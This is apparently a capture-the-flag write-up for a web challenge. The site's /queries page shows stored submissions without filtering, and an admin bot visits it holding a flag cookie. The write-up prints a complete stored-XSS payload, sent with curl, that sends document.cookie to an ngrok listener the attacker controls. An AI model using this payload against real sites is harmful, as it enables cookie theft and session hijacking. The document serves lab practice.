No much information available on the website because it just showing some of animation.
It had downloadable file, let's analyze it.
We got two endpoints there. /api/submit
are used for adding new query. then /queries
are used to show up all queries from databases but it can only be accessed from localhost only.
it also had a bot that visit /queries
page with cookie that we need to stole since we can see the flag there.
Now let's take a look on /queries
page
The queries
page just show up all queries from database and it didn't have filterization and stuff, so we can inject xss and stole the admin cookie.
First, we need to start up http server. I use python and then forward the port with ngrok since the website are using public ip and i didn't have it.
#Terminal 1
python3 -m http.server 80
#Terminal 2
ngrok http 80
#Terminal 3
curl -X POST <http://Target-IP>:Target-Port/api/submit -H "Content-Type: application/json" --data-raw '{"query" : "<script>const cookie = document.cookie; const xhttp = new XMLHttpRequest(); xhttp.open(\\"GET\\", `Your-Ngrok-Address?cookie=${cookie}`, true); xhttp.send();</script>"}'